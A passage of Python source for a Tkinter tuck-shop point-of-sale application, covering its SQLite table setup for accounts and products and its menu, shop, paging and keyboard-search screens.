be populated by the\n appropriate functions with the relevant page details\"\"\"\n\n root = Tk()\n root.config(bg='grey11')\n width, height = 1400, 760\n root.minsize(width, height)\n x = (root.winfo_screenwidth() / 2) - (width / 2)\n y = (root.winfo_screenheight() / 2.2) - (height / 2)\n root.geometry('%dx%d+%d+%d' % (width, height, x, y))\n Grid.rowconfigure(root, 0, weight=1)\n Grid.rowconfigure(root, 1, weight=1000)\n Grid.columnconfigure(root, 0, weight=1)\n\n top_bar = Frame(root, bg=\"blue2\")\n top_bar.grid(row=0, column=0, sticky=E + W)\n self.title_var = StringVar()\n self.back_btn = Button(top_bar, text=\"<--\", font=(\"Calibri\", \"24\", \"bold\"),\n command=lambda: self.main_menu())\n self.back_btn.grid(row=0, column=0, sticky=W, padx=20, pady=20, ipadx=30)\n self.title = Label(top_bar, textvariable=self.title_var, font=(\"Calibri\", \"24\", \"bold\"))\n self.title.grid(row=0, column=1, sticky=E+W, padx=20, pady=20, ipadx=30)\n self.home_btn = Button(top_bar, text=\"Home\", font=(\"Calibri\", \"24\", \"bold\"), command=lambda: self.main_menu())\n self.home_btn.grid(row=0, column=2, sticky=E, padx=20, pady=20, ipadx=10)\n Grid.rowconfigure(top_bar, 0, weight=1)\n Grid.columnconfigure(top_bar, 0, weight=1), Grid.columnconfigure(top_bar, 1, weight=5)\n Grid.columnconfigure(top_bar, 2, weight=1)\n\n self.main_frame = Frame(root, bg='grey10')\n self.main_frame.grid(row=1, column=0, sticky=N+E+S+W)\n self.main_menu()\n\n self.letters, self.numbers = 'abcdefghijklmnopqrstuvwxyz', '0123456789'\n\n self.delete = []\n self.page_items_height, self.page_items_width = 5, 3\n\n self.search = list()\n\n estyle = ttk.Style() # style is for the setting of date_picker entry bg\n estyle.element_create(\"plain.field\", \"from\", \"clam\")\n estyle.layout(\"EntryStyle.TEntry\",\n [('Entry.plain.field',\n {'children': [('Entry.background', {'children': [('Entry.padding',\n {'children': [('Entry.textarea',\n {'sticky': 'nswe'})],\n 'sticky': 'nswe'})],\n 'sticky': 'nswe'})],\n 'border': '2', 'sticky': 'nswe'})])\n estyle.configure(\"EntryStyle.TEntry\",\n fieldbackground=\"grey70\")\n\n # self.font_1, self.font_2, self.font_3 = (\"Calibri\", \"14\", \"bold\"), (\"Calibri\", \"14\", \"bold\"),\n # (\"Calibri\", \"14\", \"bold\")\n\n self.db_initialisation()\n\n root.mainloop()\n\n def db_opener(self, database_name, foreign_keys=True):\n connection = sqlite3.connect(database_name)\n cursor = connection.cursor()\n if foreign_keys:\n cursor.execute(\"PRAGMA foreign_keys = 1\")\n return connection, cursor\n\n def db_initialisation(self):\n connection, cursor = self.db_opener(\"tuck.db\")\n # cursor.execute(\"\"\"DROP TABLE employee;\"\"\")\n sql_command = list()\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts (\n account_ID INTEGER PRIMARY KEY,\n first_name VARCHAR(20) NOT NULL,\n last_name VARCHAR(30) NOT NULL,\n budget INTEGER NOT NULL,\n notes VARCHAR(255),\n date_added DATE NOT NULL);\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts_discounts (\n account_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts_spending_limit (\n account_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts_sub_zero_allowance 
(\n account_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE transactions (\n Transaction_ID INTEGER PRIMARY KEY,\n account_ID INTEGER NOT NULL,\n product_ID INTEGER NOT NULL,\n transaction_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID),\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products (\n product_ID INTEGER PRIMARY KEY,\n product_name VARCHAR(20) NOT NULL,\n cost_price INTEGER,\n selling_price INTEGER NOT NULL,\n quantity INTEGER,\n notes VARCHAR(255),\n date_added DATE NOT NULL);\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products_discount (\n product_ID INTEGER,\n amount INTEGER NOT NULL,\n type VARCHAR(1) NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products_offers (\n product_ID INTEGER,\n buy_x INTEGER NOT NULL,\n get_y INTEGER NOT NULL,\n z_off INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products_purchase_limit (\n product_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n try:\n for command in sql_command:\n cursor.execute(command)\n connection.commit()\n except sqlite3.OperationalError: # tables already exist (no need to worry abt one existing and not another)\n pass\n connection.close()\n\n connection, cursor = self.db_opener(\"settings.db\", foreign_keys=False)\n sql_command = list()\n sql_command.append(\n \"\"\"\n CREATE TABLE settings (\n setting_ID INTEGER PRIMARY KEY,\n setting_name VARCHAR(20),\n setting_val VARCHAR(20));\n \"\"\")\n try:\n for command in sql_command:\n cursor.execute(command)\n connection.commit()\n except sqlite3.OperationalError: # tables already exist\n pass\n connection.close()\n\n def set_nav_btn_cmds(self, back_btn, home_btn=\"default\"):\n \"\"\"sets navigation bar buttons with the given paramters for commands\"\"\"\n\n self.back_btn.config(command=back_btn)\n self.home_btn.config(command=home_btn if home_btn != \"default\" else lambda: self.main_menu())\n\n def main_menu(self):\n \"\"\"populates the main_frame with the main menu consisting of 3 buttons: Setup, Shop and Data\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: NONE, \"\")\n\n Grid.rowconfigure(self.main_frame, 0, weight=1)\n [Grid.rowconfigure(self.main_frame, i, weight=0) for i in range(1, 6)] # reset row configuration\n Grid.columnconfigure(self.main_frame, 0, weight=1), Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=1)\n\n self.title_var.set(\"Main Menu\")\n\n setup_btn = Button(self.main_frame, text=\"Setup\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.setup())\n setup_btn.grid(row=0, column=0, ipadx=120, ipady=60)\n shop_btn = Button(self.main_frame, text=\"Shop\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n 
command=lambda: self.shop())\n shop_btn.grid(row=0, column=1, ipadx=120, ipady=60)\n data_btn = Button(self.main_frame, text=\"Data\", font=(\"Calibri\", \"30\", \"bold\"), bg='grey60',\n command=lambda: self.data())\n data_btn.grid(row=0, column=2, ipadx=120, ipady=60)\n\n # hot keys\n self.main_frame.bind_all(1, lambda event: self.setup())\n self.main_frame.bind_all(2, lambda event: self.shop())\n self.main_frame.bind_all(3, lambda event: self.data())\n\n def setup(self):\n \"\"\"populates the main_frame with the two setup options: Accounts and Products\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: self.main_menu())\n\n self.title_var.set(\"Setup\")\n self.unbind(title_cut=False)\n\n Grid.columnconfigure(self.main_frame, 0, weight=1), Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=0)\n\n accounts_btn = Button(self.main_frame, text=\"Accounts\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.accounts())\n accounts_btn.grid(row=0, column=0, ipadx=70, ipady=30)\n products_btn = Button(self.main_frame, text=\"Products\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.products())\n products_btn.grid(row=0, column=1, ipadx=70, ipady=30)\n\n self.main_frame.bind_all(1, lambda event: self.accounts())\n self.main_frame.bind_all(2, lambda event: self.products())\n self.main_frame.bind_all('', lambda event: self.main_menu())\n\n def shop(self, page_num=1, user=list()):\n \"\"\"populates the main_frame with the list of accounts for one to be selected so that a transaction can be made\n on the chosen account\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: self.main_menu())\n\n self.title_var.set(\"Shop ({}){}\".format(len(self.table_reader('products')), ' - {}'.format(\n ''.join(self.search).upper()) if len(self.search) != 0 else ''))\n\n page = IntVar()\n page.set(page_num)\n\n font = (\"Calibri\", \"14\", \"bold\")\n\n # frame initialisation\n sales = OrderedDict()\n item_frame = Frame(self.main_frame, bg='red4')\n item_frame.grid(row=0, column=0, sticky=N + E + S + W)\n sale_frame = Frame(self.main_frame, bg='lightblue', width=250)\n sale_frame.grid(row=0, column=1, rowspan=2, sticky=N + E + S + W)\n sale_frame.grid_propagate(False)\n sale_itemised = Frame(sale_frame, bg='lightblue')\n sale_itemised.grid(row=0, column=0, sticky=N + E + S + W)\n sale_totals = Frame(sale_frame, bg='red2')\n sale_totals.grid(row=1, column=0, sticky=N + E + S + W)\n operation_btn_frame = Frame(self.main_frame, bg='green1')\n operation_btn_frame.grid(row=1, column=0, ipady=10, sticky=N + E + S + W)\n\n scrollbar = Scrollbar(sale_itemised)\n scrollbar.grid(row=0, column=1, sticky=N + S)\n listbox = Listbox(sale_itemised, yscrollcommand=scrollbar.set, font=(\"Calibri\", \"18\", \"bold\"))\n listbox.bindtags((listbox, sale_itemised, \"all\"))\n listbox.grid(row=0, column=0, sticky=N + E + S + W)\n scrollbar.config(command=listbox.yview)\n\n Grid.rowconfigure(sale_itemised, 0, weight=1)\n Grid.columnconfigure(sale_itemised, 0, weight=10), Grid.columnconfigure(sale_itemised, 1, weight=0)\n\n total_product_pages = math.ceil(len(self.table_reader('products'))\n / (self.page_items_width * self.page_items_height))\n total_product_pages = 1 if total_product_pages == 0 else total_product_pages\n total_user_pages = math.ceil(len(self.table_reader('accounts'))\n / 
(self.page_items_width * self.page_items_height))\n total_user_pages = 1 if total_user_pages == 0 else total_user_pages\n\n products = self.table_reader('products', self.get_columns('products')[1])\n\n details_amount_var, details_total_var = list(), list()\n\n for i in range(len(self.table_reader('products'))):\n if len(details_amount_var) < len(self.table_reader('products')):\n details_amount_var.append(StringVar()), details_amount_var[i].set(\"x0\")\n if len(details_total_var) < len(self.table_reader('products')):\n details_total_var.append(StringVar()), details_total_var[i].set(\"£0.00\")\n\n def product_populator():\n \"\"\"page populator specific for the products previewed in the shop page\"\"\"\n [item.destroy() for item in item_frame.grid_slaves()]\n\n self.bind(product_populator, page.get())\n\n offset = (page.get() - 1) * self.page_items_width * self.page_items_height\n\n product_frame, product_lbl, increase_qty, decrease_qty = dict(), dict(), dict(), dict()\n product_details1, product_details2, product_details3 = dict(), dict(), dict()\n m = int()\n\n def qty_changer(no, change):\n if int(details_amount_var[no].get()[1:]) != products[no][7] or products[no][7] == 0:\n details_amount_var[no].set('x{}'.format(int(details_amount_var[no].get()[1:]) + change))\n details_total_var[no].set('£{:.2f}'.format(int(details_amount_var[no].get()[1:]) *\n float(products[no][3])))\n sales_setter(no, int(details_amount_var[no].get()[1:]))\n details_updater()\n else:\n tkinter.messagebox.showinfo(\"Purchase Limit\", \"There is a purchase limit for \\'{}\\' of {}.\".format(\n products[no][1], products[no][7]))\n\n for j in range(self.page_items_height):\n Grid.rowconfigure(item_frame, j, weight=1)\n for k in range(self.page_items_width):\n if j == 0:\n Grid.columnconfigure(item_frame, k, weight=1)\n try:\n products[m + offset] # strangest thing ever! 
lines occur in the item_frame unless the products\n # array is referenced with the offset provided.\n product_frame[m] = Frame(item_frame, bg='pink', height=100, width=10)\n product_frame[m].grid(row=j, column=k, padx=10, pady=5, sticky=E + W)\n product_frame[m].grid_propagate(False)\n product_lbl[m] = Label(product_frame[m], text=\"{}\".format(products[m + offset][1]), font=font)\n product_lbl[m].grid(row=0, column=1, columnspan=3, sticky=E + W)\n product_details1[m] = Label(product_frame[m], text=\"£{}\".format(\n \"{:.2f}\".format(products[m + offset][3])), font=font, width=6) # must input amounts into\n # database without £ sign and just format it with it each time it is displayed\n product_details1[m].grid(row=1, column=1, sticky=E + W)\n\n product_details2[m] = Label(product_frame[m], textvariable=details_amount_var[m + offset],\n font=font, width=6)\n product_details2[m].grid(row=1, column=2, sticky=E + W)\n product_details3[m] = Label(product_frame[m], textvariable=details_total_var[m + offset],\n font=font, width=7)\n product_details3[m].grid(row=1, column=3, sticky=E + W)\n increase_qty[m] = Button(product_frame[m], text='+', font=font,\n command=lambda offset_m=m + offset: qty_changer(offset_m, 1))\n increase_qty[m].grid(row=0, column=0, sticky=E + W)\n decrease_qty[m] = Button(product_frame[m], text='-', font=font,\n command=lambda offset_m=m + offset: qty_changer(offset_m, -1)\n if float(details_amount_var[offset_m].get()[1:]) > 0 else None)\n decrease_qty[m].grid(row=1, column=0, sticky=E + W)\n\n Grid.columnconfigure(product_frame[m], 0, weight=2)\n Grid.columnconfigure(product_frame[m], 1, weight=1)\n Grid.columnconfigure(product_frame[m], 2, weight=1)\n Grid.columnconfigure(product_frame[m], 3, weight=1)\n Grid.rowconfigure(product_frame[m], 0, weight=1)\n Grid.rowconfigure(product_frame[m], 1, weight=1)\n except IndexError:\n break\n m += 1\n\n def sales_setter(product_no, quantity):\n item = products[product_no]\n sales[item[0]] = \"{0:}x{1:>6} @£{2:.2f} = £{3:.2f}\".format(quantity, item[1], item[3], quantity*item[3])\n if item[5] > 0:\n total = float(sales[item[0]][sales[item[0]].rfind('£') + 1:])\n sales[int(item[0]) + .5] = \"{0:>6}% off = £{1:.2f}\".format(\n item[5], total - (total * float(item[5]) / 100))\n if quantity == 0:\n del sales[item[0]]\n if int(item[0]) + .5 in sales:\n del sales[int(item[0]) + .5]\n\n listbox.delete(0, END)\n for m in sales.values():\n listbox.insert(END, m)\n\n def account_populator():\n \"\"\"page populator specific for the accounts previewed in the shop page\"\"\"\n\n [item.destroy() for item in item_frame.grid_slaves()]\n\n self.bind(account_populator, page.get())\n\n items = self.table_reader('accounts', self.get_columns('accounts')[2], self.get_columns('accounts')[1])\n offset = (page.get() - 1) * self.page_items_width * self.page_items_height\n btn, m = dict(), int()\n\n for j in range(self.page_items_height):\n Grid.rowconfigure(item_frame, j, weight=1)\n for k in range(self.page_items_width):\n if j == 0:\n Grid.columnconfigure(item_frame, k, weight=1)\n try:\n btn[m] = Button(item_frame, text=\"{} {}\".format(items[m + offset][1], items[m + offset][2]),\n font=font, width=6, height=2,\n command=lambda item_=items[m + offset]: self.combine_funcs(\n [user.pop() for _ in range(7)] if user else None, user.extend(item_),\n set_user_details(), details_updater(), page.set(1), self.unbind(),\n self.title_var.set(\"Shop\"), user_select.set(False), product_populator()))\n btn[m].grid(row=j, column=k, padx=15, pady=5, sticky=E + W)\n 
except IndexError:\n break\n m += 1\n\n def details_updater():\n \"\"\"updates the relevant details previewed at the bottom of the shop page (e.g. New Balance)\"\"\"\n\n total = float()\n for individual_total in details_total_var:\n total += float(individual_total.get()[1:])\n total = round(float(total), 3)\n\n subtotal_var.set(\"Subtotal: £{:.2f}\".format(total))\n user_discount_var.set(\"User Discount: £{:.2f} ({}%)\".format(\n float(subtotal_var.get()[11:]) * (user[4] / 100), user[4])) if user else None\n\n total_discounts = float()\n for key in [key for key in sales.keys() if '.' in str(key)]: # loops through discount keys, adding just\n # the discount values\n total_discounts += float(sales[int(key)][sales[int(key)].rfind('£') + 1:]) \\\n - float(sales[key][sales[key].rfind('£') + 1:])\n total_item_discounts_var.set(\"Total Items Discount: £{:.2f}\".format(total_discounts))\n\n total -= total_discounts\n total = total - total * (user[4] / 100) if user else total\n total_var.set(\"Total: £{:.2f}\".format(total))\n new_balance_var.set(\"New Balance: £{:.2f}\".format(float(user_budget_var.get()[9:]) - total))\n\n product_populator()\n\n user_select = BooleanVar() # for the sake of scrolling pages when selecting user (as opposed to products)\n user_select.set(False)\n\n username_var, user_budget_var, total_var, new_balance_var = StringVar(), StringVar(), StringVar(), StringVar()\n\n username = Button(operation_btn_frame, textvariable=username_var, font=font,\n command=lambda: self.combine_funcs(\n page.set(1), self.unbind(), self.title_var.set('Shop (Select Account)'),\n account_populator(), user_select.set(True)))\n username.grid(row=0, column=0, ipadx=40, ipady=0, pady=0, padx=30, sticky=E + W)\n user_budget_lbl = Label(operation_btn_frame, textvariable=user_budget_var, font=font)\n user_budget_lbl.grid(row=1, column=0, ipadx=40, ipady=0, pady=10, padx=30, sticky=E + W)\n previous_page_btn = Button(operation_btn_frame, text='<-', font=font,\n command=lambda: self.combine_funcs(\n page.set(page.get() - 1), product_populator() if not user_select.get()\n else account_populator())\n if page.get() > 1 else None)\n previous_page_btn.grid(row=0, column=1, rowspan=2, ipadx=15, padx=0)\n purchase_btn = Button(operation_btn_frame, text='Purchase', font=font,\n command=lambda connection, cursor=self.db_opener(\"tuck.db\"): self.combine_funcs(\n cursor.execute(\"UPDATE accounts SET Budget = ? 
WHERE account_no = ?;\",\n (new_balance_var.get()[14:], user[0])), connection.commit(),\n self.shop(user=[user[0], user[1], user[2], new_balance_var.get()[14:], user[4],\n user[5], user[6]])) if float(new_balance_var.get()[14:]) > 0\n else tkinter.messagebox.showerror(\n \"Not Enough Money\", \"Sorry, you don't have enough money to make this transaction.\"))\n purchase_btn.grid(row=0, column=2, rowspan=2, ipadx=40, ipady=0, pady=0, padx=30, sticky=E + W)\n next_page_btn = Button(operation_btn_frame, text='->', font=font,\n command=lambda: self.combine_funcs(\n self.combine_funcs(page.set(page.get() + 1), product_populator())\n if page.get() < total_product_pages else None)\n if not user_select.get() else self.combine_funcs(\n page.set(page.get() + 1), account_populator())\n if page.get() < total_user_pages else None)\n next_page_btn.grid(row=0, column=3, rowspan=2, ipadx=15, padx=0)\n\n # Sale_totals Frame\n subtotal_var, user_discount_var, total_item_discounts_var, pady = StringVar(), StringVar(), StringVar(), 0\n subtotal_var.set(\"Subtotal: £0.00\")\n user_discount_var.set(\"User Discount: £0.00 (0%)\")\n total_item_discounts_var.set(\"Total Items Discount: £0.00\")\n\n subtotal_lbl = Label(sale_totals, textvariable=subtotal_var, font=font)\n subtotal_lbl.grid(row=0, column=0, pady=pady, sticky=E + W)\n user_discount_lbl = Label(sale_totals, textvariable=user_discount_var, font=font)\n user_discount_lbl.grid(row=1, column=0, sticky=E + W)\n total_item_discounts_lbl = Label(sale_totals, textvariable=total_item_discounts_var, font=font)\n total_item_discounts_lbl.grid(row=2, column=0, pady=pady, sticky=E + W)\n total_lbl = Label(sale_totals, textvariable=total_var, font=font)\n total_lbl.grid(row=3, column=0, ipadx=40, ipady=0, pady=0, padx=0, sticky=E + W)\n new_balance_budget_lbl = Label(sale_totals, textvariable=new_balance_var, font=font)\n new_balance_budget_lbl.grid(row=4, column=0, ipadx=40, ipady=0, pady=pady, padx=0, sticky=E + W)\n\n # row and column configuration\n Grid.rowconfigure(self.main_frame, 0, weight=1000), Grid.rowconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 0, weight=5), Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=0)\n\n Grid.rowconfigure(sale_frame, 0, weight=6), Grid.rowconfigure(sale_frame, 1, weight=1)\n Grid.columnconfigure(sale_frame, 0, weight=1)\n\n Grid.rowconfigure(sale_totals, 0, weight=1), Grid.rowconfigure(sale_totals, 1, weight=1)\n Grid.rowconfigure(sale_totals, 2, weight=1), Grid.rowconfigure(sale_totals, 3, weight=1)\n Grid.rowconfigure(sale_totals, 4, weight=1), Grid.columnconfigure(sale_totals, 0, weight=1)\n\n Grid.rowconfigure(operation_btn_frame, 0, weight=1), Grid.columnconfigure(operation_btn_frame, 0, weight=1)\n Grid.columnconfigure(operation_btn_frame, 1, weight=1), Grid.columnconfigure(operation_btn_frame, 2, weight=1)\n Grid.columnconfigure(operation_btn_frame, 3, weight=1), Grid.columnconfigure(operation_btn_frame, 4, weight=1)\n\n def set_user_details(): # to enable dynamic setting of user details\n username_var.set(\"{} {}\".format(user[1], user[2]))\n user_budget_var.set(\"Budget: £{:.2f}\".format(float(user[3])))\n user_discount_var.set(\"User Discount: £{:.2f} ({}%)\".format(float(subtotal_var.get()[11:])\n * (user[4] / 100), user[4]))\n\n username_var.set(\"Select User\"), user_budget_var.set(\"Budget: £0.00\")\n if user:\n set_user_details()\n total_var.set(\"Total: £0.00\")\n new_balance_var.set(\"New Balance: 
£{:.2f}\".format(float(user_budget_var.get()[9:])))\n\n self.main_frame.bind_all('', lambda event: self.main_menu())\n\n def data(self):\n \"\"\"Still In Dev\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: self.main_menu())\n\n self.title_var.set(\"Data\")\n\n self.unbind(title_cut=False)\n self.main_frame.bind_all('', lambda event: self.main_menu())\n\n def accounts(self, page_num=1):\n \"\"\"provides the appropriate data for the setup_window_generator to generate the accounts window (see the\n generator itself for functionality)\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.setup_window_generator(page_num, 'accounts', self.item_form, self.table_reader, self.accounts)\n\n def setup_window_generator(self, page_num, table, add_command, page_command, caller):\n \"\"\"populates the main_frame with items along with buttons to: import new accounts, edit current account\n information, add new accounts and delete accounts as well as page interaction (moving between pages)\"\"\"\n\n self.set_nav_btn_cmds(lambda: self.setup())\n\n self.title_var.set(\"{} ({}){}\".format(table.capitalize(), len(self.table_reader(table)),\n ' - {}'.format(''.join(self.search).upper())\n if len(self.search) != 0 else ''))\n\n total_items = len(self.table_reader(table))\n total_pages = math.ceil(total_items / (self.page_items_width * self.page_items_height))\n total_pages = 1 if total_pages == 0 else total_pages\n\n page = IntVar()\n page.set(page_num)\n\n item_frame, operation_btn_frame = Frame(self.main_frame, bg='red1'), Frame(self.main_frame, bg='green1')\n item_frame.grid(row=0, column=0, sticky=N + E + S + W)\n operation_btn_frame.grid(row=1, column=0, sticky=N + E + S + W)\n\n Grid.rowconfigure(self.main_frame, 0, weight=1000), Grid.rowconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 1, weight=0), Grid.columnconfigure(self.main_frame, 2, weight=0)\n Grid.columnconfigure(self.main_frame, 3, weight=0)\n\n import_btn = Button(operation_btn_frame, text='Import', font=(\"Calibri\", \"14\", \"bold\"))\n import_btn.grid(row=0, column=0, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n add_btn = Button(operation_btn_frame, text='Add', font=(\"Calibri\", \"14\", \"bold\"),\n command=lambda page_=page.get(): add_command(0, page_, table, caller))\n add_btn.grid(row=0, column=1, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n previous_page_btn = Button(operation_btn_frame, text='Previous Page', font=(\"Calibri\", \"14\", \"bold\"),\n command=lambda: self.combine_funcs(\n self.page_populator(item_frame, page_command(\n table, self.get_columns(table)[2]\n if table == 'accounts' else self.get_columns(table)[1],\n self.get_columns(table)[1] if table == 'accounts' else None),\n page.get() - 1, table, caller),\n page.set(page.get() - 1)) if page.get() > 1 else NONE)\n previous_page_btn.grid(row=0, column=2, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n page_no_lbl = Label(operation_btn_frame, textvariable=page)\n page_no_lbl.grid(row=0, column=3, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n page_no_of_lbl = Label(operation_btn_frame, text=\"of {}\".format(total_pages))\n page_no_of_lbl.grid(row=0, column=4, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n next_page_btn = Button(operation_btn_frame, text='Next Page', font=(\"Calibri\", \"14\", \"bold\"),\n command=lambda page_=page.get(): self.combine_funcs(\n 
self.page_populator(item_frame, page_command(\n table, self.get_columns(table)[2]\n if table == 'accounts' else self.get_columns(table)[1],\n self.get_columns(table)[1] if table == 'accounts' else None),\n page.get() + 1, table, caller),\n page.set(page.get() + 1)) if page.get() < total_pages\n else NONE)\n next_page_btn.grid(row=0, column=5, ipadx=40, ipady=0, pady=20, padx=30, sticky=E + W)\n\n Grid.rowconfigure(operation_btn_frame, 0, weight=1)\n Grid.columnconfigure(operation_btn_frame, 0, weight=2), Grid.columnconfigure(operation_btn_frame, 1, weight=2)\n Grid.columnconfigure(operation_btn_frame, 2, weight=2), Grid.columnconfigure(operation_btn_frame, 3, weight=1)\n Grid.columnconfigure(operation_btn_frame, 4, weight=1), Grid.columnconfigure(operation_btn_frame, 5, weight=2)\n\n path, initial_dir, title_1 = StringVar(), \"%documents%\", \"Select the File to Import From\"\n file_types = ('csv files only', '*.csv')\n import_btn.config(command=lambda: self.combine_funcs(\n self.importer(tkinter.filedialog.askopenfilename(initialdir=initial_dir, title=title_1,\n filetypes=[file_types]), table), caller(1)))\n \n self.page_populator(item_frame, page_command(table, self.get_columns(table)[2]\n if table == 'accounts' else self.get_columns(table)[1],\n self.get_columns(table)[1] if table == 'accounts' else None),\n page.get(), table, caller)\n\n self.delete.clear()\n\n self.bind(caller, page.get())\n self.main_frame.bind_all('', lambda event: self.setup())\n\n def bind(self, caller, page):\n \"\"\"binds all relevant characters for the sake of name searching\"\"\"\n\n if len(self.search) < 30: # Until widget size is made more dynamic or is changed permanently buttons in the\n # top_bar will not fit properly if search query is larger than 30 chars\n for letter in self.letters:\n self.main_frame.bind_all(\n letter, lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.append(event.keysym),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n for number in self.numbers:\n self.main_frame.bind_all(\n number, lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.append(event.keysym),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n self.main_frame.bind_all('', lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.append(' '),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n\n else:\n self.unbind(keep_search=True)\n\n if len(self.search) != 0:\n self.main_frame.bind_all('', lambda event, title=self.title_var.get(): self.combine_funcs(\n self.search.pop(),\n self.title_var.set('{} - {}'.format(title[:title.find('-') - 1] if '-' in title else title,\n ''.join(self.search).upper())), caller(page)\n if caller.__name__ not in ['product_populator', 'account_populator'] else caller()))\n else:\n self.main_frame.unbind_all('')\n\n def unbind(self, keep_search=False, title_cut=True):\n \"\"\"unbinds all keys used for name searching\"\"\"\n\n if title_cut:\n 
self.title_var.set(self.title_var.get()[:self.title_var.get().find('-') - 1])\n for letter in self.letters:\n self.main_frame.unbind_all(letter)\n for number in self.numbers:\n self.main_frame.unbind_all(number)\n self.main_frame.unbind_all('')\n self.main_frame.unbind_all('')\n if not keep_search:\n self.search = list()\n\n def item_form(self, action, page_num, table, caller, info=None):\n \"\"\"creates form for adding (action=0) or editing (action=1) an item\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()]\n\n self.set_nav_btn_cmds(lambda: caller(page_num))\n\n center_frame = Frame(self.main_frame, bg='grey50', width=1200, height=100)\n center_frame.grid_propagate(False)\n\n self.unbind()\n self.main_frame.bind_all('', lambda event: caller(page_num))\n\n # add scroll buttons if editing\n if action == 0:\n action_ = \"Add\"\n center_frame.grid(row=0, column=0, sticky=N+S)\n Grid.columnconfigure(self.main_frame, 0, weight=1)\n else:\n action_ = \"Edit\"\n\n prev_account, next_account, page_num_prev, page_num_next = list(), list(), int(), int()\n\n prev_account_btn = Button(self.main_frame, text=\"<-\", width=4, font=(\"Calibri\", \"28\", \"bold\"),\n command=lambda: self.item_form(1, page_num_prev, table, caller, prev_account))\n prev_account_btn.grid(row=0, column=0, padx=5)\n next_account_btn = Button(self.main_frame, text=\"->\", width=4, font=(\"Calibri\", \"28\", \"bold\"),\n command=lambda: self.item_form(1, page_num_next, table, caller, next_account))\n next_account_btn.grid(row=0, column=2, padx=5)\n\n items = self.table_reader(table, 'l_name', 'f_name') if table == 'accounts' \\\n else self.table_reader(table, 'p_name')\n\n for i in range(len(items)):\n if items[i][0] == info[0] and items[i][1] == info[1]:\n if i == 0:\n prev_account_btn.config(command=lambda: None, bg='grey45')\n else:\n prev_account = items[i-1]\n page_num_prev = math.ceil(i/(self.page_items_width * self.page_items_height))\n if i == len(items) - 1:\n next_account_btn.config(command=lambda: None, bg='grey45')\n else:\n next_account = items[i+1]\n page_num_next = math.ceil((i+2)/(self.page_items_width * self.page_items_height))\n\n center_frame.grid(row=0, column=1, pady=5, sticky=N+S)\n Grid.columnconfigure(self.main_frame, 0, weight=1)\n Grid.columnconfigure(self.main_frame, 1, weight=1)\n 